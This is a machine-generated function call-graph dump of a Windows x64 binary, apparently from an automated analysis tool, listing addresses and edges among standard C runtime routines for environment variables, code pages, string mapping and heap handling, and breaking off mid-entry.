18410->18412 18412->18403 18417 7ff76d5e0043 18413->18417 18420 7ff76d5ddea8 memcpy_s 11 API calls 18413->18420 18433 7ff76d5dffde 18413->18433 18414 7ff76d5e00ce 18428 7ff76d5e00eb 18414->18428 18434 7ff76d5e013e 18414->18434 18566 7ff76d5d8a14 18415->18566 18417->18419 18422 7ff76d5ddea8 memcpy_s 11 API calls 18417->18422 18417->18433 18419->18414 18419->18433 18572 7ff76d5e62fc 18419->18572 18424 7ff76d5e0035 18420->18424 18427 7ff76d5e0065 18422->18427 18423 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18423->18403 18429 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18424->18429 18425 7ff76d5dfff7 18425->18419 18436 7ff76d5e037c 45 API calls 18425->18436 18426 7ff76d5dffd9 18430 7ff76d5d43f4 memcpy_s 11 API calls 18426->18430 18431 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18427->18431 18432 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18428->18432 18429->18417 18430->18433 18431->18419 18435 7ff76d5e00f4 18432->18435 18433->18423 18434->18433 18437 7ff76d5e26ec 40 API calls 18434->18437 18439 7ff76d5e26ec 40 API calls 18435->18439 18446 7ff76d5e00fa 18435->18446 18436->18419 18438 7ff76d5e017c 18437->18438 18440 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18438->18440 18441 7ff76d5e0126 18439->18441 18443 7ff76d5e0186 18440->18443 18444 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18441->18444 18442 7ff76d5e023f 18445 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18442->18445 18443->18433 18443->18446 18444->18446 18445->18403 18446->18442 18447 7ff76d5ddea8 memcpy_s 11 API calls 18446->18447 18448 7ff76d5e01cb 18447->18448 18449 7ff76d5e01d3 18448->18449 18450 7ff76d5e01dc 18448->18450 18451 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18449->18451 18452 7ff76d5df784 37 API calls 18450->18452 18453 7ff76d5e01da 18451->18453 18454 7ff76d5e01ea 18452->18454 18458 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18453->18458 18455 7ff76d5e027f 18454->18455 18456 7ff76d5e01f2 SetEnvironmentVariableW 18454->18456 18457 7ff76d5d9c10 _isindst 17 API calls 18455->18457 18459 7ff76d5e0216 18456->18459 18460 7ff76d5e0237 18456->18460 18461 7ff76d5e0293 18457->18461 18458->18403 18463 7ff76d5d43f4 memcpy_s 11 API calls 18459->18463 18462 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18460->18462 18462->18442 18464 7ff76d5e021b 18463->18464 18465 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18464->18465 18465->18453 18467 7ff76d5e02b1 18466->18467 18468 7ff76d5e02c9 18466->18468 18467->18342 18469 7ff76d5ddea8 memcpy_s 11 API calls 18468->18469 18476 7ff76d5e02ed 18469->18476 18470 7ff76d5e0372 18472 7ff76d5d9814 __CxxCallCatchBlock 45 API calls 18470->18472 18471 7ff76d5e034e 18474 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18471->18474 18473 7ff76d5e0378 18472->18473 18474->18467 18475 7ff76d5ddea8 memcpy_s 11 API calls 18475->18476 18476->18470 18476->18471 18476->18475 18477 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18476->18477 18478 7ff76d5d97b4 __std_exception_copy 37 API calls 18476->18478 18479 7ff76d5e035d 18476->18479 18477->18476 18478->18476 18480 7ff76d5d9c10 _isindst 17 API calls 18479->18480 18480->18470 18482 7ff76d5d89e8 18481->18482 18485 7ff76d5d89f1 18481->18485 18482->18485 18596 7ff76d5d84b0 18482->18596 18485->18357 18485->18358 18488 7ff76d5e5564 18487->18488 18489 7ff76d5e6449 18487->18489 18490 7ff76d5e5571 18488->18490 18495 7ff76d5e55a7 18488->18495 18491 7ff76d5d4178 45 API calls 18489->18491 18493 7ff76d5d43f4 memcpy_s 11 API calls 18490->18493 18511 7ff76d5e5518 18490->18511 18492 7ff76d5e647d 18491->18492 18496 7ff76d5e6482 18492->18496 18500 7ff76d5e6493 18492->18500 18503 7ff76d5e64aa 18492->18503 18497 7ff76d5e557b 18493->18497 18494 7ff76d5e55d1 18498 7ff76d5d43f4 memcpy_s 11 API calls 18494->18498 18495->18494 18499 7ff76d5e55f6 18495->18499 18496->18352 18501 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 18497->18501 18502 7ff76d5e55d6 18498->18502 18507 7ff76d5d4178 45 API calls 18499->18507 18514 7ff76d5e55e1 18499->18514 18504 7ff76d5d43f4 memcpy_s 11 API calls 18500->18504 18505 7ff76d5e5586 18501->18505 18506 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 18502->18506 18509 7ff76d5e64b4 18503->18509 18510 7ff76d5e64c6 18503->18510 18508 7ff76d5e6498 18504->18508 18505->18352 18506->18514 18507->18514 18515 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 18508->18515 18516 7ff76d5d43f4 memcpy_s 11 API calls 18509->18516 18512 7ff76d5e64ee 18510->18512 18513 7ff76d5e64d7 18510->18513 18511->18352 18838 7ff76d5e825c 18512->18838 18829 7ff76d5e55b4 18513->18829 18514->18352 18515->18496 18519 7ff76d5e64b9 18516->18519 18521 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 18519->18521 18521->18496 18522 7ff76d5d43f4 memcpy_s 11 API calls 18522->18496 18524 7ff76d5e272b 18523->18524 18525 7ff76d5e270e 18523->18525 18527 7ff76d5e2735 18524->18527 18878 7ff76d5e6f48 18524->18878 18525->18524 18526 7ff76d5e271c 18525->18526 18528 7ff76d5d43f4 memcpy_s 11 API calls 18526->18528 18885 7ff76d5e6f84 18527->18885 18531 7ff76d5e2721 memcpy_s 18528->18531 18531->18376 18533 7ff76d5d4178 45 API calls 18532->18533 18534 7ff76d5e65ba 18533->18534 18535 7ff76d5e65c8 18534->18535 18897 7ff76d5de234 18534->18897 18900 7ff76d5d47bc 18535->18900 18539 7ff76d5e66b4 18542 7ff76d5e66c5 18539->18542 18543 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18539->18543 18540 7ff76d5d4178 45 API calls 18541 7ff76d5e6637 18540->18541 18545 7ff76d5de234 5 API calls 18541->18545 18549 7ff76d5e6640 18541->18549 18544 7ff76d5dfeb3 18542->18544 18546 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18542->18546 18543->18542 18544->18397 18544->18398 18545->18549 18546->18544 18547 7ff76d5d47bc 14 API calls 18548 7ff76d5e669b 18547->18548 18548->18539 18550 7ff76d5e66a3 SetEnvironmentVariableW 18548->18550 18549->18547 18550->18539 18552 7ff76d5e039f 18551->18552 18553 7ff76d5e03bc 18551->18553 18552->18409 18554 7ff76d5ddea8 memcpy_s 11 API calls 18553->18554 18560 7ff76d5e03e0 18554->18560 18555 7ff76d5e0441 18558 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18555->18558 18556 7ff76d5d9814 __CxxCallCatchBlock 45 API calls 18557 7ff76d5e046a 18556->18557 18558->18552 18559 7ff76d5ddea8 memcpy_s 11 API calls 18559->18560 18560->18555 18560->18559 18561 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18560->18561 18562 7ff76d5df784 37 API calls 18560->18562 18563 7ff76d5e0450 18560->18563 18565 7ff76d5e0464 18560->18565 18561->18560 18562->18560 18564 7ff76d5d9c10 _isindst 17 API calls 18563->18564 18564->18565 18565->18556 18567 7ff76d5d8a24 18566->18567 18569 7ff76d5d8a2d 18566->18569 18567->18569 18922 7ff76d5d8524 18567->18922 18569->18425 18569->18426 18573 7ff76d5e6309 18572->18573 18576 7ff76d5e6336 18572->18576 18574 7ff76d5e630e 18573->18574 18573->18576 18575 7ff76d5d43f4 memcpy_s 11 API calls 18574->18575 18578 7ff76d5e6313 18575->18578 18577 7ff76d5e637a 18576->18577 18580 7ff76d5e6399 18576->18580 18594 7ff76d5e636e __crtLCMapStringW 18576->18594 18579 7ff76d5d43f4 memcpy_s 11 API calls 18577->18579 18581 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 18578->18581 18582 7ff76d5e637f 18579->18582 18583 7ff76d5e63a3 18580->18583 18584 7ff76d5e63b5 18580->18584 18585 7ff76d5e631e 18581->18585 18586 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 18582->18586 18587 7ff76d5d43f4 memcpy_s 11 API calls 18583->18587 18588 7ff76d5d4178 45 API calls 18584->18588 18585->18419 18586->18594 18589 7ff76d5e63a8 18587->18589 18590 7ff76d5e63c2 18588->18590 18591 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 18589->18591 18590->18594 18969 7ff76d5e7e18 18590->18969 18591->18594 18594->18419 18595 7ff76d5d43f4 memcpy_s 11 API calls 18595->18594 18597 7ff76d5d84c9 18596->18597 18606 7ff76d5d84c5 18596->18606 18619 7ff76d5e1900 18597->18619 18602 7ff76d5d84db 18604 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18602->18604 18603 7ff76d5d84e7 18645 7ff76d5d8594 18603->18645 18604->18606 18606->18485 18611 7ff76d5d8804 18606->18611 18608 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18609 7ff76d5d850e 18608->18609 18610 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18609->18610 18610->18606 18612 7ff76d5d882d 18611->18612 18613 7ff76d5d8846 18611->18613 18612->18485 18613->18612 18614 7ff76d5ddea8 memcpy_s 11 API calls 18613->18614 18615 7ff76d5d88d6 18613->18615 18616 7ff76d5dfaf8 WideCharToMultiByte 18613->18616 18618 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18613->18618 18614->18613 18617 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18615->18617 18616->18613 18617->18612 18618->18613 18620 7ff76d5e190d 18619->18620 18621 7ff76d5d84ce 18619->18621 18664 7ff76d5da534 18620->18664 18625 7ff76d5e1c3c GetEnvironmentStringsW 18621->18625 18626 7ff76d5d84d3 18625->18626 18627 7ff76d5e1c6c 18625->18627 18626->18602 18626->18603 18628 7ff76d5dfaf8 WideCharToMultiByte 18627->18628 18629 7ff76d5e1cbd 18628->18629 18630 7ff76d5e1cc4 FreeEnvironmentStringsW 18629->18630 18631 7ff76d5dc90c _fread_nolock 12 API calls 18629->18631 18630->18626 18632 7ff76d5e1cd7 18631->18632 18633 7ff76d5e1cdf 18632->18633 18634 7ff76d5e1ce8 18632->18634 18636 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18633->18636 18635 7ff76d5dfaf8 WideCharToMultiByte 18634->18635 18638 7ff76d5e1d0b 18635->18638 18637 7ff76d5e1ce6 18636->18637 18637->18630 18639 7ff76d5e1d0f 18638->18639 18640 7ff76d5e1d19 18638->18640 18641 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18639->18641 18642 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18640->18642 18643 7ff76d5e1d17 FreeEnvironmentStringsW 18641->18643 18642->18643 18643->18626 18646 7ff76d5d85b9 18645->18646 18647 7ff76d5ddea8 memcpy_s 11 API calls 18646->18647 18659 7ff76d5d85ef 18647->18659 18648 7ff76d5d85f7 18649 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18648->18649 18650 7ff76d5d84ef 18649->18650 18650->18608 18651 7ff76d5d866a 18652 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18651->18652 18652->18650 18653 7ff76d5ddea8 memcpy_s 11 API calls 18653->18659 18654 7ff76d5d8659 18823 7ff76d5d87c0 18654->18823 18655 7ff76d5d97b4 __std_exception_copy 37 API calls 18655->18659 18658 7ff76d5d868f 18661 7ff76d5d9c10 _isindst 17 API calls 18658->18661 18659->18648 18659->18651 18659->18653 18659->18654 18659->18655 18659->18658 18662 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18659->18662 18660 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18660->18648 18663 7ff76d5d86a2 18661->18663 18662->18659 18665 7ff76d5da545 FlsGetValue 18664->18665 18666 7ff76d5da560 FlsSetValue 18664->18666 18667 7ff76d5da552 18665->18667 18669 7ff76d5da55a 18665->18669 18666->18667 18668 7ff76d5da56d 18666->18668 18670 7ff76d5da558 18667->18670 18671 7ff76d5d9814 __CxxCallCatchBlock 45 API calls 18667->18671 18672 7ff76d5ddea8 memcpy_s 11 API calls 18668->18672 18669->18666 18684 7ff76d5e15d4 18670->18684 18673 7ff76d5da5d5 18671->18673 18674 7ff76d5da57c 18672->18674 18675 7ff76d5da59a FlsSetValue 18674->18675 18676 7ff76d5da58a FlsSetValue 18674->18676 18678 7ff76d5da5a6 FlsSetValue 18675->18678 18679 7ff76d5da5b8 18675->18679 18677 7ff76d5da593 18676->18677 18680 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18677->18680 18678->18677 18681 7ff76d5da204 memcpy_s 11 API calls 18679->18681 18680->18667 18682 7ff76d5da5c0 18681->18682 18683 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18682->18683 18683->18670 18707 7ff76d5e1844 18684->18707 18686 7ff76d5e1609 18722 7ff76d5e12d4 18686->18722 18689 7ff76d5e1626 18689->18621 18690 7ff76d5dc90c _fread_nolock 12 API calls 18691 7ff76d5e1637 18690->18691 18692 7ff76d5e163f 18691->18692 18694 7ff76d5e164e 18691->18694 18693 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18692->18693 18693->18689 18694->18694 18729 7ff76d5e197c 18694->18729 18697 7ff76d5e174a 18698 7ff76d5d43f4 memcpy_s 11 API calls 18697->18698 18700 7ff76d5e174f 18698->18700 18699 7ff76d5e17a5 18702 7ff76d5e180c 18699->18702 18740 7ff76d5e1104 18699->18740 18703 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18700->18703 18701 7ff76d5e1764 18701->18699 18704 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18701->18704 18706 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18702->18706 18703->18689 18704->18699 18706->18689 18708 7ff76d5e1867 18707->18708 18709 7ff76d5e1871 18708->18709 18755 7ff76d5df5e8 EnterCriticalSection 18708->18755 18711 7ff76d5e18e3 18709->18711 18714 7ff76d5d9814 __CxxCallCatchBlock 45 API calls 18709->18714 18711->18686 18716 7ff76d5e18fb 18714->18716 18718 7ff76d5e1952 18716->18718 18719 7ff76d5da534 50 API calls 18716->18719 18718->18686 18720 7ff76d5e193c 18719->18720 18721 7ff76d5e15d4 65 API calls 18720->18721 18721->18718 18723 7ff76d5d4178 45 API calls 18722->18723 18724 7ff76d5e12e8 18723->18724 18725 7ff76d5e12f4 GetOEMCP 18724->18725 18726 7ff76d5e1306 18724->18726 18727 7ff76d5e131b 18725->18727 18726->18727 18728 7ff76d5e130b GetACP 18726->18728 18727->18689 18727->18690 18728->18727 18730 7ff76d5e12d4 47 API calls 18729->18730 18731 7ff76d5e19a9 18730->18731 18732 7ff76d5e1aff 18731->18732 18733 7ff76d5e19e6 IsValidCodePage 18731->18733 18739 7ff76d5e1a00 memcpy_s 18731->18739 18734 7ff76d5cb870 _log10_special 8 API calls 18732->18734 18733->18732 18735 7ff76d5e19f7 18733->18735 18736 7ff76d5e1741 18734->18736 18737 7ff76d5e1a26 GetCPInfo 18735->18737 18735->18739 18736->18697 18736->18701 18737->18732 18737->18739 18756 7ff76d5e13ec 18739->18756 18822 7ff76d5df5e8 EnterCriticalSection 18740->18822 18757 7ff76d5e1429 GetCPInfo 18756->18757 18766 7ff76d5e151f 18756->18766 18763 7ff76d5e143c 18757->18763 18757->18766 18758 7ff76d5cb870 _log10_special 8 API calls 18760 7ff76d5e15be 18758->18760 18759 7ff76d5e2150 48 API calls 18761 7ff76d5e14b3 18759->18761 18760->18732 18767 7ff76d5e6e94 18761->18767 18763->18759 18765 7ff76d5e6e94 54 API calls 18765->18766 18766->18758 18768 7ff76d5d4178 45 API calls 18767->18768 18769 7ff76d5e6eb9 18768->18769 18772 7ff76d5e6b60 18769->18772 18773 7ff76d5e6ba1 18772->18773 18774 7ff76d5debb0 _fread_nolock MultiByteToWideChar 18773->18774 18778 7ff76d5e6beb 18774->18778 18775 7ff76d5e6e69 18776 7ff76d5cb870 _log10_special 8 API calls 18775->18776 18777 7ff76d5e14e6 18776->18777 18777->18765 18778->18775 18779 7ff76d5dc90c _fread_nolock 12 API calls 18778->18779 18780 7ff76d5e6c23 18778->18780 18791 7ff76d5e6d21 18778->18791 18779->18780 18782 7ff76d5debb0 _fread_nolock MultiByteToWideChar 18780->18782 18780->18791 18781 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18781->18775 18783 7ff76d5e6c96 18782->18783 18783->18791 18803 7ff76d5de3f4 18783->18803 18786 7ff76d5e6d32 18788 7ff76d5dc90c _fread_nolock 12 API calls 18786->18788 18790 7ff76d5e6e04 18786->18790 18793 7ff76d5e6d50 18786->18793 18787 7ff76d5e6ce1 18789 7ff76d5de3f4 __crtLCMapStringW 6 API calls 18787->18789 18787->18791 18788->18793 18789->18791 18790->18791 18792 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18790->18792 18791->18775 18791->18781 18792->18791 18793->18791 18794 7ff76d5de3f4 __crtLCMapStringW 6 API calls 18793->18794 18795 7ff76d5e6dd0 18794->18795 18795->18790 18796 7ff76d5e6e06 18795->18796 18797 7ff76d5e6df0 18795->18797 18799 7ff76d5dfaf8 WideCharToMultiByte 18796->18799 18798 7ff76d5dfaf8 WideCharToMultiByte 18797->18798 18800 7ff76d5e6dfe 18798->18800 18799->18800 18800->18790 18801 7ff76d5e6e1e 18800->18801 18801->18791 18802 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18801->18802 18802->18791 18809 7ff76d5de020 18803->18809 18806 7ff76d5de43a 18806->18786 18806->18787 18806->18791 18808 7ff76d5de4a3 LCMapStringW 18808->18806 18810 7ff76d5de078 __vcrt_FlsAlloc 18809->18810 18811 7ff76d5de07d 18809->18811 18810->18811 18812 7ff76d5de0ad LoadLibraryW 18810->18812 18813 7ff76d5de1a2 GetProcAddress 18810->18813 18818 7ff76d5de10c LoadLibraryExW 18810->18818 18811->18806 18819 7ff76d5de4e0 18811->18819 18814 7ff76d5de182 18812->18814 18815 7ff76d5de0d2 GetLastError 18812->18815 18813->18811 18817 7ff76d5de1b3 18813->18817 18814->18813 18816 7ff76d5de199 FreeLibrary 18814->18816 18815->18810 18816->18813 18817->18811 18818->18810 18818->18814 18820 7ff76d5de020 __crtLCMapStringW 5 API calls 18819->18820 18821 7ff76d5de50e __crtLCMapStringW 18820->18821 18821->18808 18827 7ff76d5d87c5 18823->18827 18828 7ff76d5d8661 18823->18828 18824 7ff76d5d87ee 18826 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18824->18826 18825 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18825->18827 18826->18828 18827->18824 18827->18825 18828->18660 18830 7ff76d5e55d1 18829->18830 18831 7ff76d5e55e8 18829->18831 18832 7ff76d5d43f4 memcpy_s 11 API calls 18830->18832 18831->18830 18833 7ff76d5e55f6 18831->18833 18834 7ff76d5e55d6 18832->18834 18836 7ff76d5d4178 45 API calls 18833->18836 18837 7ff76d5e55e1 18833->18837 18835 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 18834->18835 18835->18837 18836->18837 18837->18496 18839 7ff76d5d4178 45 API calls 18838->18839 18840 7ff76d5e8281 18839->18840 18843 7ff76d5e7ed8 18840->18843 18845 7ff76d5e7f26 18843->18845 18844 7ff76d5cb870 _log10_special 8 API calls 18846 7ff76d5e6515 18844->18846 18847 7ff76d5e7fad 18845->18847 18849 7ff76d5e7f98 GetCPInfo 18845->18849 18870 7ff76d5e7fb1 18845->18870 18846->18496 18846->18522 18848 7ff76d5debb0 _fread_nolock MultiByteToWideChar 18847->18848 18847->18870 18850 7ff76d5e8045 18848->18850 18849->18847 18849->18870 18851 7ff76d5dc90c _fread_nolock 12 API calls 18850->18851 18852 7ff76d5e807c 18850->18852 18850->18870 18851->18852 18853 7ff76d5debb0 _fread_nolock MultiByteToWideChar 18852->18853 18852->18870 18854 7ff76d5e80ea 18853->18854 18855 7ff76d5e81cc 18854->18855 18856 7ff76d5debb0 _fread_nolock MultiByteToWideChar 18854->18856 18857 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18855->18857 18855->18870 18858 7ff76d5e8110 18856->18858 18857->18870 18858->18855 18859 7ff76d5dc90c _fread_nolock 12 API calls 18858->18859 18860 7ff76d5e813d 18858->18860 18859->18860 18860->18855 18861 7ff76d5debb0 _fread_nolock MultiByteToWideChar 18860->18861 18862 7ff76d5e81b4 18861->18862 18863 7ff76d5e81d4 18862->18863 18864 7ff76d5e81ba 18862->18864 18872 7ff76d5de278 18863->18872 18864->18855 18867 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18864->18867 18867->18855 18868 7ff76d5e8213 18868->18870 18871 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18868->18871 18869 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18869->18868 18870->18844 18871->18870 18873 7ff76d5de020 __crtLCMapStringW 5 API calls 18872->18873 18874 7ff76d5de2b6 18873->18874 18875 7ff76d5de4e0 __crtLCMapStringW 5 API calls 18874->18875 18877 7ff76d5de2be 18874->18877 18876 7ff76d5de327 CompareStringW 18875->18876 18876->18877 18877->18868 18877->18869 18879 7ff76d5e6f51 18878->18879 18880 7ff76d5e6f6a HeapSize 18878->18880 18881 7ff76d5d43f4 memcpy_s 11 API calls 18879->18881 18882 7ff76d5e6f56 18881->18882 18883 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 18882->18883 18884 7ff76d5e6f61 18883->18884 18884->18527 18886 7ff76d5e6fa3 18885->18886 18887 7ff76d5e6f99 18885->18887 18889 7ff76d5e6fa8 18886->18889 18895 7ff76d5e6faf memcpy_s 18886->18895 18888 7ff76d5dc90c _fread_nolock 12 API calls 18887->18888 18893 7ff76d5e6fa1 18888->18893 18890 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18889->18890 18890->18893 18891 7ff76d5e6fb5 18894 7ff76d5d43f4 memcpy_s 11 API calls 18891->18894 18892 7ff76d5e6fe2 HeapReAlloc 18892->18893 18892->18895 18893->18531 18894->18893 18895->18891 18895->18892 18896 7ff76d5e28a0 memcpy_s 2 API calls 18895->18896 18896->18895 18898 7ff76d5de020 __crtLCMapStringW 5 API calls 18897->18898 18899 7ff76d5de254 18898->18899 18899->18535 18901 7ff76d5d47e6 18900->18901 18902 7ff76d5d480a 18900->18902 18906 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18901->18906 18910 7ff76d5d47f5 18901->18910 18903 7ff76d5d4864 18902->18903 18904 7ff76d5d480f 18902->18904 18905 7ff76d5debb0 _fread_nolock MultiByteToWideChar 18903->18905 18907 7ff76d5d4824 18904->18907 18904->18910 18911 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18904->18911 18916 7ff76d5d4880 18905->18916 18906->18910 18908 7ff76d5dc90c _fread_nolock 12 API calls 18907->18908 18908->18910 18909 7ff76d5d4887 GetLastError 18912 7ff76d5d4368 _fread_nolock 11 API calls 18909->18912 18910->18539 18910->18540 18911->18907 18915 7ff76d5d4894 18912->18915 18913 7ff76d5d48c2 18913->18910 18914 7ff76d5debb0 _fread_nolock MultiByteToWideChar 18913->18914 18919 7ff76d5d4906 18914->18919 18920 7ff76d5d43f4 memcpy_s 11 API calls 18915->18920 18916->18909 18916->18913 18917 7ff76d5d48b5 18916->18917 18921 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18916->18921 18918 7ff76d5dc90c _fread_nolock 12 API calls 18917->18918 18918->18913 18919->18909 18919->18910 18920->18910 18921->18917 18923 7ff76d5d853d 18922->18923 18930 7ff76d5d8539 18922->18930 18943 7ff76d5e1d4c GetEnvironmentStringsW 18923->18943 18926 7ff76d5d8556 18950 7ff76d5d86a4 18926->18950 18927 7ff76d5d854a 18928 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18927->18928 18928->18930 18930->18569 18935 7ff76d5d88e4 18930->18935 18932 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18933 7ff76d5d857d 18932->18933 18934 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18933->18934 18934->18930 18936 7ff76d5d8907 18935->18936 18941 7ff76d5d891e 18935->18941 18936->18569 18937 7ff76d5debb0 MultiByteToWideChar _fread_nolock 18937->18941 18938 7ff76d5ddea8 memcpy_s 11 API calls 18938->18941 18939 7ff76d5d8992 18940 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18939->18940 18940->18936 18941->18936 18941->18937 18941->18938 18941->18939 18942 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18941->18942 18942->18941 18944 7ff76d5d8542 18943->18944 18945 7ff76d5e1d70 18943->18945 18944->18926 18944->18927 18946 7ff76d5dc90c _fread_nolock 12 API calls 18945->18946 18948 7ff76d5e1da7 memcpy_s 18946->18948 18947 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18949 7ff76d5e1dc7 FreeEnvironmentStringsW 18947->18949 18948->18947 18949->18944 18951 7ff76d5d86cc 18950->18951 18952 7ff76d5ddea8 memcpy_s 11 API calls 18951->18952 18963 7ff76d5d8707 18952->18963 18953 7ff76d5d870f 18954 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18953->18954 18955 7ff76d5d855e 18954->18955 18955->18932 18956 7ff76d5d8789 18957 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18956->18957 18957->18955 18958 7ff76d5ddea8 memcpy_s 11 API calls 18958->18963 18959 7ff76d5d8778 18960 7ff76d5d87c0 11 API calls 18959->18960 18962 7ff76d5d8780 18960->18962 18961 7ff76d5df784 37 API calls 18961->18963 18965 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18962->18965 18963->18953 18963->18956 18963->18958 18963->18959 18963->18961 18964 7ff76d5d87ac 18963->18964 18966 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18963->18966 18967 7ff76d5d9c10 _isindst 17 API calls 18964->18967 18965->18953 18966->18963 18968 7ff76d5d87be 18967->18968 18971 7ff76d5e7e41 __crtLCMapStringW 18969->18971 18970 7ff76d5e63fe 18970->18594 18970->18595 18971->18970 18972 7ff76d5de278 6 API calls 18971->18972 18972->18970 19772 7ff76d5e9ef3 19773 7ff76d5e9f03 19772->19773 19776 7ff76d5d4788 LeaveCriticalSection 19773->19776 19320 7ff76d5cbe70 19321 7ff76d5cbe80 19320->19321 19337 7ff76d5d8ec0 19321->19337 19323 7ff76d5cbe8c 19343 7ff76d5cc168 19323->19343 19325 7ff76d5cbef9 19326 7ff76d5cc44c 7 API calls 19325->19326 19336 7ff76d5cbf15 19325->19336 19328 7ff76d5cbf25 19326->19328 19327 7ff76d5cbea4 _RTC_Initialize 19327->19325 19348 7ff76d5cc318 19327->19348 19330 7ff76d5cbeb9 19351 7ff76d5d832c 19330->19351 19338 7ff76d5d8ed1 19337->19338 19339 7ff76d5d8ed9 19338->19339 19340 7ff76d5d43f4 memcpy_s 11 API calls 19338->19340 19339->19323 19341 7ff76d5d8ee8 19340->19341 19342 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 19341->19342 19342->19339 19344 7ff76d5cc179 19343->19344 19347 7ff76d5cc17e __scrt_acquire_startup_lock 19343->19347 19345 7ff76d5cc44c 7 API calls 19344->19345 19344->19347 19346 7ff76d5cc1f2 19345->19346 19347->19327 19376 7ff76d5cc2dc 19348->19376 19350 7ff76d5cc321 19350->19330 19352 7ff76d5d834c 19351->19352 19359 7ff76d5cbec5 19351->19359 19353 7ff76d5d8354 19352->19353 19354 7ff76d5d836a GetModuleFileNameW 19352->19354 19355 7ff76d5d43f4 memcpy_s 11 API calls 19353->19355 19358 7ff76d5d8395 19354->19358 19356 7ff76d5d8359 19355->19356 19357 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 19356->19357 19357->19359 19360 7ff76d5d82cc 11 API calls 19358->19360 19359->19325 19375 7ff76d5cc3ec InitializeSListHead 19359->19375 19361 7ff76d5d83d5 19360->19361 19362 7ff76d5d83dd 19361->19362 19366 7ff76d5d83f5 19361->19366 19363 7ff76d5d43f4 memcpy_s 11 API calls 19362->19363 19364 7ff76d5d83e2 19363->19364 19365 